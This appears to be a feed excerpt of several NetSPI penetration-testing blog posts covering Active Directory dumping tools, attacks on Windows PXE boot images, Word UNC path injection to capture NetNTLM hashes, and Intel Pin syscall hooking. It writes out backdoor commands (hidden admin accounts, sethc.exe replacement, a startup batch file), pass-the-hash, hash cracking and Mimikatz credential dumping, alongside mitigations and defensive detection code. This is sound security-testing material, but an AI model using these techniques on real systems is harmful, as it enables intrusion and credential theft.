The functions also support providing an alternative SQL Server login for authenticating to the SQL Server and an alternative Windows credential for configuring server links.  More command examples can be found here.

The Authentication and Authorization Matrix

Depending on the current user’s security context or the provided credentials, the user may not have access to query AD for information. The tables below illustrate privileges and the corresponding access.

OPENQUERY (Linked server) auth table by Scott Sutherland (@_nullbind)

Current User (Domain User – Public)Current User (Domain User – Sysadmin)Current User (SQL Login – Public)Current User (SQL Login – Sysadmin)Provided Domain UserAccess
XNo
XYes
XNo
XNo
XXNo
XXYes
XXNo
XXYes

OPENROWSET (Ad Hoc query) auth table by Scott Sutherland (@_nullbind)

Current User (Domain User – Public)Current User (Domain User – Sysadmin)Current User (SQL Login – Public)Current User (SQL Login – Sysadmin)Provided Domain UserAccess
XNo
XYes
XNo
XYes
XXNo
XXYes
XXNo
XXYes

Conclusion

Recon is an essential first step in assessing the security of an Active Directory environment. Thanks to some great work by Will Schroeder (@harmj0y) and others on Powerview. Hopefully these AD recon functions will provide another medium to accomplish the same end.  For more information on the newly added AD recon functions, check out the PowerUpSQL wiki!

The post Dumping Active Directory Domain Info – with PowerUpSQL! appeared first on NetSPI.

]]>
Dumping Active Directory Domain Info – in Go! https://www.netspi.com/blog/technical-blog/network-pentesting/dumping-active-directory-domain-info-in-go/ Tue, 17 Apr 2018 07:00:46 +0000 https://www.netspi.com/dumping-active-directory-domain-info-in-go/ I've used NetSPI PowerShell tools and the PowerView toolset to dump information from Active Directory during almost every internal penetration test I've done. These tools are a great starting point for gaining insight into an Active Directory environment. Go seems to be gaining popularity for its performance and scalability, so I tried to replicate some of the functionality in my favorite PowerShell tools. goddi (go dump domain info) dumps domain users, groups, domain controllers, and more in CSV output. And it runs on Windows and Linux!

The post Dumping Active Directory Domain Info – in Go! appeared first on NetSPI.

]]>
I’ve used NetSPI PowerShell tools and the PowerView toolset to dump information from Active Directory during almost every internal penetration test I’ve done. These tools are a great starting point for gaining insight into an Active Directory environment. Go seems to be gaining popularity for its performance and scalability, so I tried to replicate some of the functionality in my favorite PowerShell tools. goddi (go dump domain info) dumps domain users, groups, domain controllers, and more in CSV output. And it runs on Windows and Linux!

Before going any further, I want to thank Scott Sutherland (@_nullbind) for his help and mentorship. This work is based off of internal tools he created and none of it would be possible without him! This tool is also based on work from Antti Rantasaari, Eric Gruber (@egru), Will Schroeder (@harmj0y), and the PowerView authors.

So Why Go?

Go is fast and supports cross platform compilation. During testing, goddi managed to cut execution time down to a matter of seconds when compared to its PowerShell counterparts. Go binaries can also be built for Windows, Linux, and MacOS all on the same system. The full list of OS and architecture combinations are listed in the go GitHub repo. At the time of this blog’s release, goddi has been tested on Windows (10 and 8.1) and Kali Linux.

That isn’t to say that there aren’t any drawbacks with a Go implementation. The Microsoft ADSI API is much more flexible to work with, especially when creating LDAP queries to run under the current user’s security context. goddi requires domain credentials to be explicitly provided on the command line. This can be especially annoying in scenarios where a user’s credentials may not be known. If you get access to a box with local Administrator, but don’t have domain credentials yet, you can run PSExec to get local system. With local system, you can check if you have domain user privileges and then run PowerShell in this current context without domain credentials. This functionality is on the roadmap for future development.

Features

Check out the GitHub repo for an up to date list of features. goddi dumps…

  • Domain users
  • Users in privileged user groups (DA, EA, FA)
  • Users with passwords not set to expire
  • User accounts that have been locked or disabled
  • Machine accounts with passwords older than 45 days
  • Domain Computers
  • Domain Controllers
  • Sites and Subnets
  • SPNs
  • Trusted domain relationships
  • Domain Groups
  • Domain OUs
  • Domain Account Policy
  • Domain deligation users
  • Domain GPOs
  • Domain FSMO roles
  • LAPS passwords
  • GPP passwords

Run goddi with the example command below. The CSV output is dumped in the “csv” folder in the current working directory.

goddi-windows-amd64.exe -username=juser -password="Fall2017!" -domain="demo.local" -dc="10.2.9.220" -unsafe

Goddi

Roadmap

In the future, I would love to see if I can get this tool to operate closer to the ADSI model. Being able to run the tool in the user’s current context would be preferable from a testing standpoint. I would also like to improve how GPP passwords are gathered. Network shares to the target DC are mapped and mounted with the net use and mount commands. While GPP cpassword searching works with these commands, I have not gotten the chance to add robust error handling for corner cases when dealing with underlying OS errors.

GitHub Repo

Check out the goddi GitHub repo for install and usage instructions. I’ll be updating the features list and roadmap there. Comments and commits are welcome! I’m not a Go expert, so I would appreciate any constructive feedback.

The post Dumping Active Directory Domain Info – in Go! appeared first on NetSPI.

]]>
Attacks Against Windows PXE Boot Images https://www.netspi.com/blog/technical-blog/network-pentesting/attacks-against-windows-pxe-boot-images/ Tue, 13 Feb 2018 07:00:56 +0000 https://www.netspi.com/attacks-against-windows-pxe-boot-images/ If you've ever run across insecure PXE boot deployments during a pentest, you know that they can hold a wealth of possibilities for escalation. Gaining access to PXE boot images can provide an attacker with a domain joined system, domain credentials, and lateral or vertical movement opportunities. This blog outlines a number of different methods to elevate privileges and retrieve passwords from PXE boot images.

The post Attacks Against Windows PXE Boot Images appeared first on NetSPI.

]]>
If you’ve ever run across insecure PXE boot deployments during a pentest, you know that they can hold a wealth of possibilities for escalation. Gaining access to PXE boot images can provide an attacker with a domain joined system, domain credentials, and lateral or vertical movement opportunities. This blog outlines a number of different methods to elevate privileges and retrieve passwords from PXE boot images. These techniques are separated into three sections: Backdoor attacks, Password Scraping attacks, and Post Login Password Dumps. Many of these attacks will rely on mounting a Windows image and the title will start with “Mount image disk”.

Recommended tools:

General overview:

PXE booting a Windows image with Hyper-V

Create a new VM through the New Virtual Machine Wizard. Follow the guided steps and make sure to choose the “Install an operating system from a network-based installation server” option. Check the settings menu after the wizard is complete and make sure “Legacy Network Adapter” is at the top of the Startup order.

Img A A Becfa B

Save and start the VM. The PXE network install should start and begin the Microsoft Deployment Toolkit deployment wizard.

Img A C Fc A

Run through the wizard and start the installation task sequence for the target image. This can take a while.

Img A A A

Mounting a Windows image

Once the setup is completely finished (including the Windows operating system setup), you should have a working Windows VM. Make sure to shutdown the VM safely and download the Kali Linux iso. Go to the Settings menu and choose the location of your DVD drive image file.

Img A Aa B B

Now, change the boot order so that “CD” is at the top of the BIOS startup order.

Img A Ad B

Save the settings and start the VM. Choose to boot into the “Live (forensic mode)”.

Img A B Dee

Once Kali is booted, mount the Windows partition with the following sample commands. Make sure to change the  example /dev/sda2 partition use case.

fdisk -l
mkdir /mnt/ntfs
mount -t ntfs-3g /dev/sda2 /mnt/ntfs

Img A C Baa A

Backdoor Attacks

1. Add a local Administrator during setup.

This is probably the simplest way to gain elevated access to the system image. After going through the Windows PE boot process, go back into the Settings menu for the VM. Set “IDE” to be at the top in the “Startup order” of the BIOS section.

Img A D B B

Save the settings, start the VM, and connect to the console. The VM should enter the initial Windows setup process. Pressing Shift+F10 will bring up a system console. Note that this is different than pressing F8 during the Windows PE deployment phase. Enter the following commands to add your local Administrator user.

net user netspi Password123! /add
net localgroup administrators /add netspi

Img A A

Check the Administrators group membership.

Img A Cb D

Now that the user has been created and added to the Administrators group, wait for the VM to finish setup and log in.

Img A Ff D

Once logged in, you will have local Administrator privileges! We can go a step further and obtain local system with PsExec.

PsExec.exe -i -s cmd.exe

Img A Fb E Da

The local system cmd prompt can be used to check if the computer account has domain user privileges. This can be a good starting point for mapping out the domain with a tool like BloodHound/SharpHound.

2. Mount image disk – Add batch or executable files to all users.

The shortcuts or files located in C:Users%username%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup will run when the users log in at startup. Change directories to the Administrator’s Startup directory and create a batch file with the following commands.

@echo off
net user "startup" "password" /add
net localgroup "Administrators" /add "startup"

Img A Fcc B

The batch file will run when the Administrator user logs in. If this attack is combined with attack scenario #4, the Administrator user can log in with a blank password. Check to see that the startup user is created and added to the Administrators group after login.

Img A A A

3. Mount image disk – Overwrite sethc.exe or other accessibility options.

Replacing sethc.exe (Sticky Keys) is a classic privilege escalation technique. sethc.exe is located at %windir%System32sethc.exe. The command below copies cmd.exe and renames it to sethc.exe.

cp cmd.exe sethc.exe

Img A Add Fee

If sticky keys is enabled, a local system cmd prompt will pop up when “Shift” is clicked five times in a row.

Img A Ae Daea

4. Mount image disk – Use chntpw tool to overwrite Administrator password.

The chntpw tool can clear the password for a Windows user. The SAM and SYSTEM files are located in the %windir%\System32\config directory.

Img A A Dc D A

The netspi user’s password is cleared and the account can be logged into without entering a password.

Img A D C E

Password Scraping Attacks

5. Scrape VM memory files for passwords during install or login.

My colleague James Houston deserves a huge shout out for coming up with this attack. The general idea here is to use the snapshot or suspension functionality to capture passwords in the VM’s memory. This can be done during the actual PXE boot deployment process, installation, or login steps. This example will retrieve the password for the deployment service account during the MDT deployment process.

The deployment user is used to join computers to the domain in the “Computer Details” step of the deployment task sequence.

Img A D Ce D E

At this point, either suspend or take a snapshot of the VM’s current state. In Hyper-V, use the Checkpoint functionality to take a snapshot. Under the Checkpoint menu in Settings, make sure that “Standard checkpoints” is selected. This will ensure application and system memory is captured. The snapshot location is also set in this menu.

Img A Abaaf

Browse to the snapshot file location and look for the corresponding files for your hypervisor.

  • VMWare: .vmem, .vmsn (snapshot memory file), .vmss (suspended memory file)
  • Hyper-V: .BIN, .VSV, .VMRS (virtual machine runtime file)

Since this example uses Hyper-V, copy off the .VMRS file to search for passwords. I used Kali Linux along with strings and grep to locate the service account and password. Searching for keywords like “User” or “Password” is a great start if the username or password was not displayed during the Windows Deployment Wizard.

strings PXEtest.VMRS | grep -C 4 "UserID=deployment"

Img A D Ebcb

6. Mount image disk – Review local Unattend/Sysprep files.

Unattend and Sysprep files can contain passwords used for deployment and setup. The following locations contain files related to Sysprep.

  • %windir%\Panther
  • %windir%\Panther\Unattend
  • %windir%\System32\Sysprep

In this case, the unattend.xml file has been sanitized but it is always worth checking these locations for passwords and sensitive information.

Img A Eab A

7. Mount image disk – Copy the SAM file and pass the hash with the Administrator account.

The SAM and SYSTEM files are located in the %windir%\System32\config directory.

Img A D B A B

This file can be copied off to your local machine and Mimikatz can be used to extract the hashes. The Administrator hash can be used in pass the hash attacks with CrackMapExec or Invoke-TheHash.

crackmapexec smb targetip -u username -H LMHASH:NTHASH

Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

This can be an extremely effective technique to elevate privileges if the domain has shared local Administrator passwords.

8. Mount image disk – Copy the SAM file and crack the Administrator account.

Like above, once the SAM and SYSTEM files are copied to your local machine, the Administrator account can be cracked with Hashcat or John the Ripper. A sample Hashcat command is below. Visit the hashcat wiki for setup and basic usage.

hashcat64.bin -m 1000 targethashes.txt wordlist.txt -r crackrule.rule -o cleartextpw.txt --outfile-format 5 --potfile-disable --loopback -w 3

Post Login Password Dumps

Once the techniques above have given access to the PXE booted image, we can dump passwords. Mimikatz is a great tool for password dumping.

sekurlsa::logonpasswords will dump passwords from LSASS memory.

Img A Dcc

lsadump::secrets dumps the LSA secrets.

Img A Ebe D F

vault::cred dumps saved credentials from the Credential Manager. However, if a saved credential is set as a domain password type, this command will not retrieve the credential successfully. The Mimikatz wiki has a good explanation on how to extract these credentials.

Mitigation and Prevention

There are inherent security risks associated with the use of PXE deployments that do not require authentication or authorization of any kind, especially on user LANs. It is highly recommended that PXE installations require credentials to begin the installation process. For example, this can be configured on a distribution server simply by checking “Require a password when computers use PXE” in System Center Configuration Manager.

One of the main takeaways from the attacks above is that applications or software that contain sensitive data should not be included in any images. In addition, shared local Administrator passwords or service account passwords should not be used on images (or anywhere in the domain). Images can be compromised and this should help reduce the risk to machines on the domain. Finally, PXE deployments should only be available on isolated networks. Check out these best practices from Microsoft for more information on securing PXE boot deployments.

References

Thanks to Scott Sutherland (@_nullbind), Alex Dolney (@alexdolney), and James Houston for their wisdom and guidance!

  • https://www.vmware.com/products/personal-desktop-virtualization.html
  • https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/about/
  • https://www.kali.org/downloads/
  • https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
  • https://github.com/BloodHoundAD/BloodHound
  • https://github.com/BloodHoundAD/SharpHound
  • https://github.com/byt3bl33d3r/CrackMapExec
  • https://github.com/Kevin-Robertson/Invoke-TheHash
  • https://hashcat.net/wiki/
  • https://github.com/gentilkiwi/mimikatz
  • https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
  • https://docs.microsoft.com/en-us/sccm/osd/plan-design/security-and-privacy-for-operating-system-deployment

The post Attacks Against Windows PXE Boot Images appeared first on NetSPI.

]]>
Microsoft Word – UNC Path Injection with Image Linking https://www.netspi.com/blog/technical-blog/network-pentesting/microsoft-word-unc-path-injection-image-linking/ Tue, 02 Jan 2018 07:00:39 +0000 https://www.netspi.com/microsoft-word-unc-path-injection-image-linking/ Microsoft Word is an excellent attack vector during a penetration test. From web application penetration tests to red team engagements, Word documents can be used to grab NetNTLM hashes or prove insufficient egress filtering on a network. This blog will cover a slightly different approach: inserting an image via a link.

The post Microsoft Word – UNC Path Injection with Image Linking appeared first on NetSPI.

]]>
Microsoft Word is an excellent attack vector during a penetration test. From web application penetration tests to red team engagements, Word documents can be used to grab NetNTLM hashes or prove insufficient egress filtering on a network. There has been an abundance of quality research done on Word attack vectors. If you haven’t had a chance yet, make sure to check out the latest blog from netbiosX on capturing NetNTLM hashes via frameset. Using the same core concepts, this blog will cover a slightly different approach: inserting an image via a link.

The following tools will be helpful:

Linking an image

To link an image, open the insert tab and click the Pictures icon. This will bring up the explorer window. In the file name field, enter the malicious URL and hit the insert drop down to choose “Link to File”. A burp collaborator link has been used for easy demonstration.

Img A Fe Fd C

Once linked, the broken image can be sized down to nothing. This is an added plus if your malicious document will be used in a red team or social engineering engagement.

Img A A Bbef

Make sure to save the changes to the document. Now, whenever this document is opened, Microsoft Word will attempt to resolve the image linked in the document. These requests are logged in the Burp Collaborator client.

Img A A E B

Capturing NetNTLM hashes with UNC path injection

Again, the methods discussed here will be similar to the latest blog from netbiosX. Using 7zip, extract the files contained in the Word document. The file we want to modify is document.xml.rels, located under your_word_doc.docxword_rels. This file contains a list of relationships and their associated targets. The Relationship in question is going to be of type image. Set the Target value to the UNC path of your listening host.

Img A Aa D A

Save the file and copy it over to the word document with 7zip.

Img A A A Bd

Once a user opens the Word document, Inveigh or Responder will capture incoming authentication requests.

PS C:> Invoke-Inveigh -NBNS N -LLMNR N -ConsoleOutput Y -IP 192.168.0.2 
Inveigh 1.3.1 started at 2017-12-19T17:22:26 
Elevated Privilege Mode = Enabled 
WARNING: Windows Firewall = Enabled 
Primary IP Address = 192.168.0.2 
LLMNR Spoofer = Disabled 
mDNS Spoofer = Disabled 
NBNS Spoofer = Disabled 
SMB Capture = Enabled 
WARNING: HTTP Capture Disabled Due To In Use Port 80 
HTTPS Capture = Disabled 
Machine Account Capture = Disabled 
Real Time Console Output = Enabled 
Real Time File Output = Disabled 
WARNING: Run Stop-Inveigh to stop Inveigh Press any key to stop real time console output
 
2017-12-19T17:23:19 SMB NTLMv2 challenge/response captured from 192.168.0.3(DESKTOP-2QRDJR2): 
Administrator::DESKTOP-2QRDJR2:57[TRUNCATED]cb:091[TRUNCATED]5BC:010[TRUNCATED]02E0032002E00310038003200000000000000000000000000

One of the major advantages of this method is that there is no indication to the end user that Word is attempting to connect to a malicious URL or UNC path. The request is made once the document is opened and there is no URL or UNC path displayed at startup.

Relationship Target enumeration with PowerShell

The method described above is simple, yet extremely powerful since it abuses trusted, inherent functionality in Microsoft Office. This section describes two extremely simple methods for enumerating relationship targets without using 7zip. There are plenty of forensics tool sets that will do this more efficiently, such as Yara, and this is by no means a comprehensive forensic approach.

The Word.Application COM object can be used to access the contents of the Word document. This can be achieved with a few simple commands. The WordOpenXML property contains the Relationships in the document.

$file = "C:pathtodoc.docx"
$word = New-Object -ComObject Word.Application
$doc = $word.documents.open($file)
$xml = New-Object System.XML.XMLDocument
$xml = $doc.WordOpenXML
$targets = $xml.package.part.xmlData.Relationships.Relationship
$targets | Format-Table
$word.Quit()

Img A Ad Ff

This will successfully enumerate all the Relationships in the document along with their corresponding targets. The issue here is that when using the Word.Application COM object, a Word process is started and the URL/UNC path is resolved.

Img A D A

To avoid this, we can use the DocumentFormat.OpenXML library and enumerate all External Relationships in the document. No collaborator requests or authentication requests were captured using this method during testing.

[System.Reflection.Assembly]::LoadFrom("C:DocumentFormat.OpenXml.dll")
$file = "C:pathtodoc.docx"
$doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file,$true)
$targets = $doc.MainDocumentPart.ExternalRelationships
$targets
$doc.Close()

Img A Bde D F

Going a step further, the DeleteExternalRelationship method will remove the relationship with the external URL by providing the relationship id.

$doc.MainDocumentPart.DeleteExternalRelationship("rId4")

References

Thanks to Josh Johnson and Karl Fosaaen (@kfosaaen) for their help and contributions.

  • https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/

The post Microsoft Word – UNC Path Injection with Image Linking appeared first on NetSPI.

]]>
Dynamic Binary Analysis with Intel Pin https://www.netspi.com/blog/technical-blog/thick-application-pentesting/dynamic-binary-analysis-intel-pin/ Tue, 30 May 2017 07:00:14 +0000 https://www.netspi.com/dynamic-binary-analysis-intel-pin/ For this blog, I’ll explore Intel’s Pin tool and Linux system call hooking. Pin offers a comprehensive framework for creating pin tools to instrument at differing levels of granularity.

The post Dynamic Binary Analysis with Intel Pin appeared first on NetSPI.

]]>
Intro to Intel Pin

Dynamic Binary Instrumentation (DBI) is a technique for analyzing a running program by dynamically injecting analysis code. The added analysis code, or instrumentation code, is run in the context of the instrumented program with access to real, runtime values. DBI is a powerful technique since it does not require the source code for a program, as opposed to static analysis methods. In addition, it can instrument programs that generate code dynamically. To security researchers, DBI frameworks are invaluable tools as they allow for efficient ways to perform fuzzing, control flow analysis, and vulnerability detection with minimal overhead.

For this blog, I’ll explore Intel’s Pin tool and Linux system call hooking. Pin offers a comprehensive framework for creating pin tools to instrument at differing levels of granularity. You can find links to the Pin documentation in the references section. Also check out Gal Diskin’s slides from BlackHat for a more hands on overview of Pin’s functionality.

Identifying Linux System Calls

The main function of our pin tool example will be to intercept and identify the system calls made by a program. For reference, we can view the Linux x86_64 system call table here: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/.

This table will help to identify the system calls by the mapped system call number.

One of the advantages of DBI is that we do not need the source code for analysis. For the sake of simplicity, the python script below will be our target for instrumentation. We know that it returns the response of a GET request to Google.

import urllib2
page = urllib2.urlopen("https://www.google.com").read()

We can use the strace tool to see the system calls made.

# strace python http.py
execve("/usr/bin/python", ["python", "http.py"], [/* 19 vars */]) = 0
[TRUNCATED]
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
sendto(3, "GET / HTTP/1.1\r\nAccept-Encoding:"..., 117, 0, NULL, 0) = 117
recvfrom(3, "HTTP/1.1 200 OK\r\nDate: Mon, 15 M"..., 8192, 0, NULL, NULL) = 1418
recvfrom(3, "d\"><meta content=\"@GoogleDoodles"..., 7422, 0, NULL, NULL) = 2836
recvfrom(3, "ocation,b=a.href.indexOf(\"#\");if"..., 4586, 0, NULL, NULL) = 4586
recvfrom(3, "b\" value=\"Google Search\" name=\"b"..., 8192, 0, NULL, NULL) = 3154
recvfrom(3, "", 5038, 0, NULL, NULL)    = 0
recvfrom(3, "", 8192, 0, NULL, NULL)    = 0
close(3)                                = 0
[TRUNCATED]

The strace output above gives us an abundance of information to work with, but we will focus on the system calls we want to intercept: sendto and recvfrom. These system calls are used to transmit messages to and from sockets. We can see the arguments provided to both of the system calls and we will try to read those same arguments with our pin tool.

Hooking sendto and recvfrom

The Pin API for system calls starts with two main functions: PIN_AddSyscallEntryFunction and PIN_AddSyscallExitFunction. These functions register callback functions for before and after the execution of the system call, respectively. The registered callback functions allow us to add instrumentation code before and after every system call is executed.

PIN_AddSyscallEntryFunction(&syscallEntryCallback, NULL);
PIN_AddSyscallExitFunction(&syscallExitCallback, NULL);

We can get the system call number with the PIN_GetSyscallNumber function. This function will get the system call number in the current context. Likewise, we can get the arguments for the current system call with PIN_GetSyscallArgument where ‘i’ is the ordinal number of the argument value.

//sendto: 44, recvfrom: 45
PIN_GetSyscallNumber(ctxt, std);
PIN_GetSyscallArgument(ctxt, std, i);

By referencing the man pages for our intercepted system calls we know that the second argument holds a pointer to a buffer containing the message contents to be sent or received. The third argument is the length of that buffer. Once we intercept our system call, we can read the value of the buffer with the code below.

ADDRINT buf = PIN_GetSyscallArgument(ctxt, std, 1);
ADDRINT len = PIN_GetSyscallArgument(ctxt, std, 2);
int buflen = (int)len;
char *bufptr = (char *)buf;
for (int i = 0; i < buflen; i++, bufptr++) {
    fprintf(stdout, "%c", *bufptr);
}

The buffer pointer is our starting point and we walk “byte-by-byte” dereferencing the buffer pointer to read the value at each point until we hit the end length. Putting it all together, we can see some of the results below.

#../../../pin -t obj-intel64/syscalltest.so -- python http.py
call PIN_AddSyscallEntryFunction
call PIN_AddSyscallExitFunction
call PIN_StartProgram()
[TRUNCATED]
systemcall sendto: 44
buffer start: 0x7ff81ef26eb4
length: 117
GET / HTTP/1.1
Accept-Encoding: identity
Host: www.google.com
Connection: close
User-Agent: Python-urllib/2.7
[TRUNCATED]
systemcall recvfrom: 45
buffer start: 0x5644e5db7934
length: 8192
emtype="https://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp" name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script>
[TRUNCATED]

The output of the example is far from clean but it does contain the information we want to intercept, the GET request and response. We can identify the system calls associated with network communications and even see the values of the arguments passed back and forth. Imagine if our binary from before sent login credentials in a GET request. We can retrieve that information.

systemcall sendto: 44
buffer start: 0x7f3b3dcf61c4
length: 146
GET /login?user=admin&pass=badpass HTTP/1.1
Accept-Encoding: identity
Host: www.notarealhost.com
Connection: close
User-Agent: Python-urllib/2.7

This example only scrapes the surface of the functionality that the Pin framework has to offer. In the future, I hope to create more complex tools for fuzzing.

You can find the example code at https://github.com/NetSPI/Pin.

References

The post Dynamic Binary Analysis with Intel Pin appeared first on NetSPI.

]]>